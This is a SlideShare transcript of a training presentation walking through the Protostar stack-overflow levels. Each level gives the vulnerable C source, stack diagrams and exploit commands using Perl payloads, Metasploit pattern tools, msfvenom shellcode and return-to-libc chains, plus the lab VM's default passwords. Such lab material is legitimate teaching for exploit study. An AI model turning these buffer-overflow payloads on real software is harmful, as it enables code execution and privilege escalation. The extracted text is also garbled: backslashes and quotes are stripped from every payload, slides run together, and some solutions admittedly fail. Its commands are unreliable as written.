Exploit exercises.com stack-overflows

2,683 views
2,502 views

Published on

Presentation based on Exploit-Exercises.com Protostar virtual machine. Example 6 may not work correctly.

Published in: Technology
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,683
On SlideShare
0
From Embeds
0
Number of Embeds
8
Actions
Shares
0
Downloads
75
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Exploit exercises.com stack-overflows

  1. 1. Exploit-Exercises.com Stack Overflows Spenser Reinhardt
  2. 2. What Is A Buffer Overflow?A buffer overflow occurs when a program or process tries tostore more data in a buffer (temporary data storage area)than it was intended to hold. Since buffers are created tocontain a finite amount of data, the extra information -which has to go somewhere - can overflow into adjacentbuffers, corrupting or overwriting the valid data held inthem.
  3. 3. Tools In UsePerl – Inline perl expressions, either using $( expression ) or expression | program,depending on the need. Used to quicklyGDB – GNU Debugger, allows debugging of applications, inspecting of livevariables, memory, and registers. Crash dumps know as core files can also beanalyzed in the same manors.Metasploit Console: In ../msf/tools Pattern_Create.rb – Creates a specialized pattern that can be used to identify how many bytes into a buffer important locations are such as EIP or variables Pattern_Offset.rb – Based on a small subset of bytes returned from overflowed buffers filled with patterns from pattern_create, this locates how far into the buffer the bytes that returned are. Venom – Creates shellcode, with the ability to change function, and encode shellcode to avoid bad characters and detection.
  4. 4. Preparing ProtostarIn virtual console windowLogin User: root Pass: godmodeGet an IP dhclient & ifconfig | grep “inet addr”
  5. 5. Preparing Protostar Cont. Login ssh user@[IP] Pass: user Unlimit core dumps ulimit -c unlimited ulimit -a | grep core Change to bash shell /bin/bash Change to binary dir cd /opt/protostar/bin/
  6. 6. Level 0 (Source)int main(int argc, char **argv) { volatile int modified; char buffer[64]; modified = 0; gets(buffer); if(modified != 0) { printf("you have changed the modified variablen"); } else { printf("Try again?n"); }}
  7. 7. Level 0 (Diagram)The Stack Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Char buffer = 64 bytesUninitalizedstack space
  8. 8. Level 0 (Solution)/opt/protostar/bin$ ./stack0 test Try again?/opt/protostar/bin$ perl -e print "a"x68 | ./stack0 you have changed the modified variable
  9. 9. Level 1 (source)int main(int argc, char **argv) { volatile int modified; char buffer[64]; if(argc == 1) { errx(1, "please specify an argumentn"); } modified = 0; strcpy(buffer, argv[1]); if(modified == 0x61626364) { printf("you have correctly got the variable to the right valuen"); } else { printf("Try again, you got 0x%08xn", modified); }}
  10. 10. Level 1The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Modified == 0x61626364 Char buffer = 64 bytesUninitalizedstack space
  11. 11. Level 1 (Solution)./stack1 test Try again, you got 0x00000000./stack1 $(perl -e print "a"x70) Try again, you got 0x61616161./pattern_create.rb 70 [MSF Pattern]./stack1 [MSF Pattern] Try again, you got 0x63413163./pattern_offset.rb 63413163 = 64 bytes./stack1 $(perl -e print "a"x64 . "x64x63x62x61nr") you have correctly got the variable to the right value
  12. 12. Level 2 (Source)int main(int argc, char **argv) { volatile int modified; char buffer[64]; char *variable; variable = getenv("GREENIE"); if(variable == NULL) { errx(1, "please set the GREENIE environment variablen"); } modified = 0; strcpy(buffer, variable); if(modified == 0x0d0a0d0a) { printf("you have correctly modified the variablen"); } else { printf("Try again, you got 0x%08xn", modified); }}
  13. 13. Level 2The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Int modified = 0 Modified == 0x0d0a0d0a Char buffer = 64 bytes Char *variableUninitalizedstack space
  14. 14. Level 2 (Solution)./stack2 stack2: please set the GREENIE environment variableexport GREENIE=$(perl -e print "a"x80)./stack2 Try again, you got 0x61616161./pattern_create.rb 70 [MSF Pattern]export GREENIE=[MSF locator string]./stack2 Try again, you got 0x63413163./pattern_offset.rb 63413163 = 64 bytesexport GREENIE=$(perl -e print "a"x64 . "x0ax0dx0ax0dnr")./stack2 you have correctly modified the variable
  15. 15. Level 3 (Source)void win() { printf("code flow successfully changedn");}int main(int argc, char **argv) { volatile int (*fp)(); char buffer[64]; fp = 0; gets(buffer); if(fp) { printf("calling function pointer, jumping to 0x%08xn", fp); fp(); }}
  16. 16. Level 3The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Int fp = 0 Must point to win() Win() = 0x08048424 Char buffer = 64 bytes void win() { printf("code flow successfully changedn"); } fp = 0;Uninitalized gets(buffer);stack space if(fp) { printf("calling function pointer, jumping to 0x%08xn", fp); fp(); } }
  17. 17. Level 3 (Solution)./stack3 Testperl -e print "a"x80 | ./stack3 calling function pointer, jumping to 0x61616161 Segmentation fault./pattern_create.rb 70 [MSF Pattern]./stack3 - [MSF Pattern] calling function pointer, jumping to 0x63413163./pattern_offset.rb 63413163 = 64 bytesobjdump -d ./stack3 | grep win 08048424 <win>perl -e print "a"x64 . "x24x84x04x08nr" | ./stack3 calling function pointer, jumping to 0x08048424 code flow successfully changed
  18. 18. Level 4 (Source)void win() { printf("code flow successfully changedn");}int main(int argc, char **argv) { char buffer[64]; gets(buffer);}
  19. 19. Level 4The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP EIP must point to win() Win() = 0x080483f4 Char buffer = 64 bytes void win() { printf("code flow successfully changedn"); }Uninitalized fp = 0;stack space gets(buffer); if(fp) { printf("calling function pointer, jumping to 0x%08xn", fp); fp(); } }
  20. 20. Level 4 (Solution)./stack4 Testperl -e print "a"x80 | ./stack4 Segmentation fault./pattern_create.rb 70 [MSF Pattern]Gdb –quiet ./stack4 Run - [MSF Pattern]Program received signal SIGSEGV, Segmentation fault.0x63413563 in ?? ()./pattern_offset.rb 63413563 = 76 bytesobjdump -d ./stack4 | grep win 080483f4 <win>perl -e print "a"x76 . "xf4x83x04x08" | ./stack4 code flow successfully changed Segmentation fault
  21. 21. Level 5 (Source)int main(int argc, char **argv) { char buffer[64]; gets(buffer);}
  22. 22. Level 5The Stack (Diagram) Previous Stack Frames Contains previous EIP & ESP Overwritten with nop sled and Shellcode. Current EIP – must be overwritten to point to our shellcode EIP = 0x08048424 Char buffer = 76 bytes int main(int argc, char **argv) {Uninitalizedstack space char buffer[64]; gets(buffer); }
  23. 23. Level 5 (Solution 1)perl -e print "a"x80 | ./stack5 Segmentation fault./pattern_create.rb 80 [MSF Pattern]Gdb –-quiet ./stack5 run [MSF Pattern] Program received signal SIGSEGV, Segmentation fault. 0x63413563 in ?? () (gdb) x $esp 0xbffff7c0./pattern_offset.rb 63413563 = 76 bytesLocation of EIP = 0xbffff760 + 76h = 0xbffff7d6
  24. 24. Level 5 (Solution 2)msfvenom -p linux/x86/exec -f pl -b x00xff CMD=/bin/bash PrependSetresuid=true = ~70bytesperl -e print "a"x76 . "xc0xf7xffxbf" . "x90"x16 ."xdbxd3xd9x74x24xf4x5dxbbx62x1axd1xfex2bxc9xb1x0bx83xedxfcx31x5dx16x03x5dx16xe2x97x70xdaxa6xcexd7xbax3exddxb4xcbx58x75x14xbfxcex85x02x10x6dxecxbcxe7x92xbcxa8xf0x54x40x29x2ex37x29x47x1fxc4xc1x97x08x79x98x79x7bxfd" | ./stack5Result: Program exits cleanly without executing a shell.Reason: /bin/dash has issues with the incoming stdin from the original Program. It must check for this issue and close automatically. This Is due to the gets() function being used. More Details: StackOverflow.com
  25. 25. Level 5 (Solution 3)msfvenom -p linux/x86/exec -f pl -b xcox04x00xff CMD=touch /tmp/touchPrependSet resuid=trueperl -e print "a"x76 . "xc0xf7xffxbf" . "x90"x16 ."xdaxd0xbbx78xe4x7ax44xd9x74x24xf4x58x29xc9xb1x0ex31x58x17x83xc0x04x03x20xf7x98xb1xbaxfcx04xa3x68x65xddxfexefxe0xfax69xc0x81x6cx6ax76x49x0fx03xe8x1cx2cx81x1cx0fxb3x26xdcx44xdcx53xbfxccx02xb3x4bx60x33xe4xc7x15xc6x99x4fxeax7fx0dx06x0bxb2x31" | ./stack5user@protostar:/opt/protostar/bin$ ls /tmp/touchLocal shell code for gets() - http://www.exploit-db.com/exploits/13357/
  26. 26. Level 6 (Source)void getpath(){ char buffer[64]; unsigned int ret; printf("input path please: "); fflush(stdout); gets(buffer); ret = __builtin_return_address(0); if((ret & 0xbf000000) == 0xbf000000) { printf("bzzzt (%p)n", ret); _exit(1); } printf("got path %sn", buffer);}int main(int argc, char **argv { getpath();}
  27. 27. Level 6The Stack (Diagram) Previous Stack Frames Current EIP Char buffer = 64 bytesUninitalizedstack space
  28. 28. Level 6The Stack (Diagram 2) This address Address of SHELLCODE Address of SHELLCODE Address of FORMATSTRING Address of execl() Address of printf() Previously EIP Char buffer = 64 bytesUninitalizedstack space
  29. 29. Level 6 (Solution 1)./pattern_create.rb 100 [MSF Pattern]Gdb –-quiet ./stack6 Run Input path please:[MSF Pattern] got path [MSF Pattern]Program received signal SIGSEGV, Segmentation fault.0x37634136 in ?? ()./pattern_offset.rb 0x37634136 80msfvenom -p linux/x86/exec -f pl -b xcox04x00xff CMD=touch/tmp/touch PrependSet resuid=true [SHELLCODE] ~ 80 bytesperl -e print "a"x80 . "xf0xf7xffxbf" . [SHELLCODE] | ./stack6 input path please: bzzzt (0xbffff7f0)
  30. 30. Level 6 (Solution 2)gdb --quiet ./stack6 (gdb) break main Breakpoint 1 at 0x8048500: file stack6/stack6.c, line 27. (gdb) run Starting program: /opt/protostar/bin/stack6 Breakpoint 1, main (argc=1, argv=0xbffff864) (gdb) print printf $1 = {<text variable, no debug info>} 0xb7eddf90 <__printf> (gdb) print execl $2 = {<text variable, no debug info>} 0xb7f2e460 <*__GI_execl>export FORMATSTRING=”%3$n”export SHELLCODE=”/location/to/shellcodefile”~/getenvaddr FORMATSTRING ./stack6 FORMATSTRING will be at 0xbffff9a7~/getenvaddr SHELLCODE ./stack6 SHELLCODE will be at 0xbffff9b6
  31. 31. Level 6 (Solution 3)(Using altered stack6 binary)~/stackx input path please: a 0xbffff75c got path agdb --quiet ~/stackx (gdb) break getpath Breakpoint 1 at 0x804848a (gdb) run Starting program: /home/user/stackx Breakpoint 1, 0x0804848a in getpath () (gdb) x/4000s $esp … 0xbffff966: "/home/user/stackx" … 0xbfffffea: "/home/user/stackx"
  32. 32. Level 6 (Solution 4)/home/user/stackx = 17 bytes/opt/protostar/bin/stack6 = 25 bytes Difference of = 8 bytesShows twice in mem = 16 bytes total80 x “a” = 80 bytes20 for other addresses = 20 bytesStarting point of = 0xbffff75cperl -e printf("0x%08xn", 0xbffff75c + 20 + 80 + 16) 0Xbffff7d0
  33. 33. Level 6 (Solution 5)Printf = 0xB7EDDF90Execl = 0xB7F2E460$FORMATSTRING = 0xBFFFF9A8$SHELLCODE = 0xBFFFF9B6End of buffer (here) = 0XBFFFF7D0BUFFER (80)| printf | execl | FORMATSTRING| SHELLCODE | SHELLCODE |hereperl -e print "a"x80 . "x90xdfxedxb7" . "x60xe4xf2xb7" . "xa8xf9xffxbf" ."xb6xf9xffxbf"x2 . "xd0xf7xffxbf" | ./stack6Seg fault
  34. 34. Level 7 (Source)char *getpath(){ char buffer[64]; unsigned int ret; printf("input path please: "); fflush(stdout); gets(buffer); ret = __builtin_return_address(0); if((ret & 0xb0000000) == 0xb0000000{ printf("bzzzt (%p)n", ret); _exit(1); } printf("got path %sn", buffer); return strdup(buffer);}int main(int argc, char **argv){ getpath();}
  35. 35. Level 7 (Diagram) Address of SHELLCODE Previous Stack Frames Filler buffer = 8 bytes Containsof jmp, ESP ret Address EIP & jmp, Char buffer = 80 bytes Char buffer = 80 bytesUninitalizedstack space
  36. 36. Level 7 (Solution 1)./pattern_create.rb 100 [MSF Pattern]gdb –-quiet ./stack7 input path please: [MSF Pattern] Program received signal SIGSEGV, Segmentation fault. 0x37634136 in ?? ()./pattern_offset.rb 0x37634136 80
  37. 37. Level 7 (Solution 2)scp user@192.168.1.10:/opt/protostar/bin/stack7 ~/stack7msfelfscan -j edx ~/stack7 [~/stack7]msfelfscan -p ~/stack7 [~/stack7] 0x08048492 pop ebx; pop ebp; ret 0x080485c7 pop edi; pop ebp; ret 0x080485f7 pop ebx; pop ebp; ret
  38. 38. Level 7 (Solution 3)perl -e print "a"x80 . "x92x84x04x08" . "c"x100 > /tmp/7-testgdb --quiet ./stack7 (gdb) run < /tmp/7-test Program received signal SIGSEGV, Segmentation fault. 0x63636363 in ?? ()./pattern_create.rb 50 [MSF Pattern]perl -e print "a"x80 . "x92x84x04x08" . "[MSF Pattern]”’ > /tmp/7-testgdb --quiet ./stack7 (gdb) run < /tmp/7-test Program received signal SIGSEGV, Segmentation fault. 0x33614132 in ?? ()
  39. 39. Level 7 (Solution 4)./pattern_offset.rb 0x33614132 8perl -e print "a"x80 . "x92x84x04x08" . "C"x8 . "D"x4 > /tmp/7-testgdb --quiet ./stack7 (gdb) run < /tmp/7-test Starting program: /opt/protostar/bin/stack7 < /tmp/7-test Program received signal SIGSEGV, Segmentation fault. 0x44444444 in ?? ()msfvenom -p linux/x86/exec -f pl -b xcox04x00xff CMD=touch/tmp/touch PrependSet resuid=true [MSF Shellcode]export SHELLCODE=`perl -e print “[MSF Shellcode]"`~/getenvaddr SHELLCODE ./stack7 SHELLCODE will be at 0xbffff960
  40. 40. Level 7 (Solution 4)perl -e print "a"x80 . "x92x84x04x08" . "C"x8 . "x60xf9xffxbf" | ./stack7input path please: got pathaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa��aaaaaaaaaaaa��CCCCCCCC`���ls /tmp/ touch
  41. 41. Questions? Thanks!Exploit-exercises.com – Virtual machine creators Mattandreko.com - TutorialsHacking: The Art of Exploitation – Jon Erickson

×